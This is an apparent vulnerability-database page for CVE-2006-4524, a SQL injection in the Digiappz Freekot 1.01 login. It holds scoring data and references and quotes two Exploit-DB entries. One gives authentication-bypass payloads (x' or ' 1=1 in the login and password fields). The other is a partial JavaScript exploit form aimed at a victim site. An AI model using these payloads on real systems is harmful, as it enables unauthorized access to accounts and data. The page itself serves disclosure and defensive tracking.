CVE-2006-4524
published 2006-09-01CVE-2006-4524: Multiple SQL injection vulnerabilities in login_verif.asp in Digiappz Freekot 1.01 allow remote attackers to execute arbitrary SQL commands via the (1) login…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.26%
65.9th percentile
Multiple SQL injection vulnerabilities in login_verif.asp in Digiappz Freekot 1.01 allow remote attackers to execute arbitrary SQL commands via the (1) login or (2) password parameters. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| digiappz | freekot | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Digiappz Freekot - Authentication Bypass
exploitdb·2009-12-16
CVE-2006-4524 Digiappz Freekot - Authentication Bypass
Digiappz Freekot - Authentication Bypass
---
[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~]Tybe:(4u7h 8yp455) Remote SQL Injection Vulnerability
[?]
[~]Vendor: www.digiappz.com
[?]Software:freekot
[?]
[?]author: ((R3d-D3v!L))
[?]
[?]Date: 16.dec.2009
[?]T!ME: 11:30 pm
[?] Home: WwW.xP10.ME
[?]
[?] contact: N/A
[?]
[?]??????????????????????{DEV!L'5 of SYST3M}??????????????????
[?] Exploit:
[?] E-/\/\A!L : x' or ' 1=1
[?] password : x' or ' 1=1
[?]demo:
[?]http://server/freekot/login.asp
N073:
REAL RED DEV!L W@S h3r3 LAMERZ
GAZA !N our hearts !
[~]-----------------------------{D3V!L5 0F 7h3 SYS73M!?!}-----------------------------------------------------
[~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0
Exploit-DB
Digiappz Freekot 1.01 - ASP SQL Injection
exploitdb·2006-08-30
CVE-2006-4524 Digiappz Freekot 1.01 - ASP SQL Injection
Digiappz Freekot 1.01 - ASP SQL Injection
---
source: https://www.securityfocus.com/bid/19768/info
Digiappz Freekot is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit could allow an attacker to compromise the application, retrieve sensitive information, or modify data; other consequences are possible as well.
KAPDA :: Freekot SQL-Injection Vulnerability , Login bypass exploit function egxpl() { if (document.xplt.victim.value=="") { alert("Please enter victim site!"); return false; } if (confirm("Are you sure?")) { xplt.action=document.xplt.victim.value+"/login_verif.asp"; xplt.login.value=document.xplt.login.value; xplt.password.value=document.xplt.password.value; xplt.submit(); } } KAPDA :: Freekot SQL-Injecti
No writeups or analysis indexed.
http://secunia.com/advisories/21669http://securityreason.com/securityalert/1488http://www.kapda.ir/advisory-410.htmlhttp://www.kapda.ir/attach-1996-xpl_freekot.htmhttp://www.securityfocus.com/archive/1/444752/100/0/threadedhttp://www.securityfocus.com/bid/19768https://exchange.xforce.ibmcloud.com/vulnerabilities/28672http://secunia.com/advisories/21669http://securityreason.com/securityalert/1488http://www.kapda.ir/advisory-410.htmlhttp://www.kapda.ir/attach-1996-xpl_freekot.htmhttp://www.securityfocus.com/archive/1/444752/100/0/threadedhttp://www.securityfocus.com/bid/19768https://exchange.xforce.ibmcloud.com/vulnerabilities/28672
2006-09-01
Published